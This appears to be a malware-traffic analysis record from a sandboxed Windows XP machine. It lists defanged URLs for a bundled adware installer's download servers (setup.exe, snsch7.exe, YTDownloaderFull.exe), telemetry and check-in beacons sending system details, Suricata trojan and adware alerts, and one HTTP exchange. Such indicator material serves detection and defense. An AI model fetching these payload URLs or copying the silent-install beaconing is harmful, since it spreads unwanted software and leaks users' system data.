hxxp://rep.shopper-pro.com/app/ping.ashx?action=uidCreated&userid={3DDADCD7-C12E-426F-B69A-34C6CF1194AE}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1441695314	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1441695318	54.231.12.92
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p YSQXKBzk9X6XwtLXz/thLs IILilpWF2i0VMQ3MIkYUWlOV1/FwpsQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd1JReJqqw1xf7 h81hw0eWAY8/tWrUBEVB2BoZjQ6FIIw==	198.232.124.192
hxxp://vvr4w8-1ghhyl1c.netdna-ssl.com/YTDownloaderFull.exe	198.232.124.192
hxxp://dl.ourinputinfonet.com/spdbt/shoppy/snsch7.exe	69.16.175.10
hxxp://dl.devmaxcloud.com/web/gf/all/setup.exe_d	69.16.175.42
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1441695317	54.231.12.92
hxxp://dl.devmaxcloud.com/spdbt/shoppy/snsch7.exe_b	69.16.175.42
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1441695318	54.231.12.92
hxxp://dl.devmaxcloud.com/web/gf/all/setup.exe_c	69.16.175.42
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1441695318	54.231.12.92
hxxp://dl.devmaxcloud.com/web/gf/all/setup.exe_b	69.16.175.42
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=obiBp3WOda875Lloa5mq/1A3FobYz9pDW1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY8E9cK9dYE7s6Dkd6d9pF8iTYCy99Gl4E9Wqh4iojbHdqGvv5sqhroDaM1aE/ClNTTua4Maub6eC74r1XQZFERJL7ZfSEVa6OEQyD12F 1Nyjgb6v7cXpPt2nKkLkHTcAQh7fCP95dTKIvain/ mm qbu5v3xCXDGx8nj342zNscaFm7B 9FuQufg5RFwTuVQNkfjvqjwagYFSalK01pNv1rgCpvLjSxnlO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnq4HymoAeTplYsVN63O8acvsG738OKyeGhM1IhxvZTJw=	198.232.124.192
hxxp://stats.devmaxcloud.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1441695306&lifetime=0&silent=1&crtnm=na&procstarttime=1441695306&procruntime=15&rnd=1441695321	54.231.11.90
hxxp://dl.keybufferbox.com/web/gf/all/setup.exe	69.16.175.10
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=PcwT4QFtuPDiDhjjz73apkXtTXOwAAQBsU/fGw8OkC2AMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KybE/th1ZHmv0EomROJjSQrg/US69jjK3DfkKZPeLk1IXa8iDQLHG9inCtSd9DvDByFsXwpAaO73LVAezdf3aKUUmvGwE2ItoihD9gPpiV Hiz4gguKWlYXSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYNdcr9M9goCFnm437Rwp3ALYLGwKvXHzIxmb7yrGl6ig==	198.232.124.192
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1441695317	54.231.12.92
hxxp://logs.devmaxcloud.com/monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1441695305&asw=0_1073750528_-2147483648_2048&browser=&rnd=1441695305	69.16.175.42
hxxp://stats.devmaxcloud.com/apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1441695305&lifetime=0&silent=1&crtnm=na&procstarttime=1441695305&procruntime=15&rnd=1441695320	54.231.11.90
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p/ZGSjSNMjhLtXDXZHqh b9jyJC8MAmcYqh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHk9G0rDhsRNGMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rJsT 2HVkea/QSiZE4mNJCuA/K9XB4YFpc=	198.232.124.192
hxxp://stats.devmaxcloud.com/installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_83&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1441695305&procruntime=8&rnd=1441695313	54.231.11.90
hxxp://dl.devmaxcloud.com/spdbt/shoppy/snsch7.exe_c	69.16.175.42
hxxp://logs.devmaxcloud.com/monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1441695306&asw=0_1073750528_-2147483648_2048&browser=&rnd=1441695306	69.16.175.42
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1441695318	54.231.12.92
hxxp://dl.devmaxcloud.com/spdbt/shoppy/snsch7.exe_a	69.16.175.42
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1441695320	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1441695316	54.231.12.92
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QgW8pN5r26ZQhScA1jb3TygKFoNUu98snvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9y1QHs3X92ilFBkBMfD9KDE9CUHeR8YCF37xF ks/cxyedSa5ff0d ewiFdvuPDE o9/ 3Oh70qOREesZtFS5hy9kyls9Tqoi qVH5d1uj0MylcflycUBz3y3QPqxzrS768NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU=	198.232.124.192
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1441695317	54.231.12.92
hxxp://dl.devmaxcloud.com/web/gf/all/setup.exe_a	69.16.175.42
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p8CFMPu/XF4Lika8ANLts6Gs8HdD6KPa68kmUanERQNRTUGfFn6TH8UjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWm5xtDBkuzBZw==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p9IxKFhhAIX38mxw368usKjpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVZZXXlPOL JdxOsvBqt15abnG0MGS7MFn	198.232.124.192
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1441695319	54.231.12.92
hxxp://4kxq0rpgo-zxis6jz8.netdna-ssl.com/t.ashx?e=QgW8pN5r26ZQhScA1jb3TygKFoNUu98snvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9yWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn	198.232.124.192
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1441695314	54.231.12.92
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p p3jNnuGZ/QCM8BjoE4r5ojgb6v7cXpPtX8qMQRZgpmz/9fsKQO4 yu6aPorR5b/Qlc4m6AJLdylO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnq4HymoAeTplYsVN63O8acvsG738OKyeGhM1IhxvZTJw=	198.232.124.192
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1441695318	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1441695318	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1441695317	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1441695320	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1441695318	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1441695317	54.231.12.92
hxxp://stats.devmaxcloud.com/installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_83&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695305&procruntime=15&rnd=1441695320	54.231.11.90
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=QgW8pN5r26ZQhScA1jb3TygKFoNUu98snvZi s3jtzEHqUQ0J3/4E35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9y1QHs3X92ilFBkBMfD9KDE9CUHeR8YCF3WFoBNBxLOthEFwWlUecUJzgAdaVkPwOvLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw==	198.232.124.192
hxxp://dl.devmaxcloud.com/web/gf/all/setup.exe_e	69.16.175.42
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p97T8dW3vpmMBQC drCF7eFnfXu8jqisF9cJKC1Reo3n9s2Fs g80z0k6Cr9laSF2XrRbZnBny0uhv3iEz1ZNnAYhSLf3gsJzhYWVjeFKSrgJuiaaVAZCiP8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWPBPXCvXWBO7Og5HenfaRfIk2AsvfRpeBPl2Ah9DV9msw==	198.232.124.192
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1441695316	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1441695317	54.231.12.92
hxxp://rep.ytdownloader.com/app/ping.ashx?action=uidCreated&userid={3DDADCD7-C12E-426F-B69A-34C6CF1194AE}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://errors.devmaxcloud.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695306&procruntime=8&rnd=1441695314	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1441695317	54.231.12.92
hxxp://dl.devmaxcloud.com/spdbt/shoppy/snsch7.exe_d	69.16.175.42
hxxp://stats.devmaxcloud.com/installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_100&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695306&procruntime=15&rnd=1441695321	54.231.11.90
hxxp://stats.devmaxcloud.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_100&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1441695306&procruntime=7&rnd=1441695313	54.231.11.90
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p/HmSIpx5WtIABZGQjpShx/0JQd5HxgIXfHd4yt /3jYZEcs3sjXWP5pqLgzsej8XLE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KybE/th1ZHmv0EomROJjSQrgPyvVweGBaX	198.232.124.192
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1441695306	54.231.12.92
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p/WdlP5RfIHxwTxIUcsgQ wrYotdzxAEMpx1QZiJL1PeP7IjMscFXrLxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsmxP7YdWR5r9BKJkTiY0kK4D8r1cHhgWlw==	198.232.124.192
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1441695315	54.231.12.92
hxxp://dl.devmaxcloud.com/spdbt/shoppy/snsch7.exe_e	69.16.175.42
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1441695314	54.231.12.92
hxxp://rep.ytdownloader.com/app/ping.ashx?action=start&userid={3DDADCD7-C12E-426F-B69A-34C6CF1194AE}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=TWljcm9zb2Z0IFdpbmRvd3MgWFAgUHJvZmVzc2lvbmFsIFNlcnZpY2UgUGFjayAzIChidWlsZCAyNjAwKQA=&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://rep.ytdownloader.com/app/ping.ashx?action=install&userid=&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=MjEyMTQA&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1441695317	54.231.12.92
hxxp://errors.devmaxcloud.com/installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695305&procruntime=9&rnd=1441695314	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1441695317	54.231.12.92
hxxp://rep.ytdownloader.com/app/ping.ashx?action=start&userid={3DDADCD7-C12E-426F-B69A-34C6CF1194AE}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=IGNvbnZlcnRlcjogMy4zLjEuNTsgZHJpdmVyOiBDOlxQcm9ncmFtIEZpbGVzXFlURG93bmxvYWRlclxzYm1udHIuc3lzIDEuMC4wLjI7IGhlbHBlcjogMS4wLjEuNTsgc2VydmljZTogMS4wLjEuNTsA&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1441695305	54.231.12.92
hxxp://errors.devmaxcloud.com/utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1441695316	54.231.12.92
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p9DLf a7VREBQC drCF7eFSWMoVW1eu9C5 wx ILhhSxoWNAP4OWMILkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOQUT2GlJZn0XRSL9MKpLGedUpfWelS8fiA==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p8eMZiMaXQ3mwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45BRPYaUlmfRdFIv0wqksZ51Sl9Z6VLx I	198.232.124.192

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Executable served from Amazon S3
ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET MALWARE Win32/Toolbar.CrossRider.A Checkin
SURICATA STREAM FIN out of window
SURICATA STREAM SHUTDOWN RST invalid ack

Traffic

GET /utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1441695306 HTTP/1.1

Host: errors.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 3EK6tPmwcUJuUtRkWjwzr rCqGu4H4c4oMz 88G6g6UiQqW69EGZHfvgITK7jHpc

x-amz-request-id: 94DD138EB6961E60

Date: Tue, 08 Sep 2015 06:55:04 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 3EK6tP
mwcUJuUtRkWjwzr rCqGu4H4c4oMz 88G6g6UiQqW69EGZHfvgITK7jHpc..x-amz-requ
est-id: 94DD138EB6961E60..Date: Tue, 08 Sep 2015 06:55:04 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Sun, 02 Aug 2015 13:00:22 GMT..ETag: "28d6814f309e
